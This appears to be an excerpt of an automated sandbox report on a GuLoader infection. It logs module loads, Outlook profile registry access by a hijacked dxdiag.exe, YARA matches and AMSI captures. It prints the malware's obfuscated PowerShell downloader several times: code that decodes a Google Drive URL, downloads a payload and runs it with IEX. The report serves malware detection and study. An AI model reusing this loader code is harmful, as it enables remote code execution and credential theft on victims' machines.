                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: Binary string: m.Core.pdb source: powershell.exe, 00000004.00000002.3010425134.0000000000D65000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: dxdiag.pdbGCTL source: 31437F.exe.18.dr
                Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000004.00000002.3010425134.0000000000D65000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: dxdiag.pdb source: 31437F.exe.18.dr
                Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.3010425134.0000000000D11000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: on.pdb source: powershell.exe, 00000004.00000002.3032733282.0000000007606000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Yara detected GuLoader
                Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 2072, type: MEMORYSTR
                Source: Yara matchFile source: 00000004.00000002.3038911552.000000000B1AF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3038628107.0000000008960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3026899970.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2241948302.000002B4370DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Buriers)$global:Meatball189 = [System.Text.Encoding]::ASCII.GetString($Unitarismes)$global:Yasmak=$Meatball189.substring($Frastdtes,$Tracheloclavicular)<#Curtseyed Kuans Unbesot Plud
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Reeker $Hnd109 $Udlignende102), (Delayer @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Chitlin = [AppDomain]::CurrentDomain.GetAssemblies()$global:Eksame
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Horrah)), $Outpoise).DefineDynamicModule($Countably, $false).DefineType($Carle, $Undramatical, [System.MulticastDelegate])$Duehgenes.D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Buriers)$global:Meatball189 = [System.Text.Encoding]::ASCII.GetString($Unitarismes)$global:Yasmak=$Meatball189.substring($Frastdtes,$Tracheloclavicular)<#Curtseyed Kuans Unbesot Plud
                Suspicious powershell command line found
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfru
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfru
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ 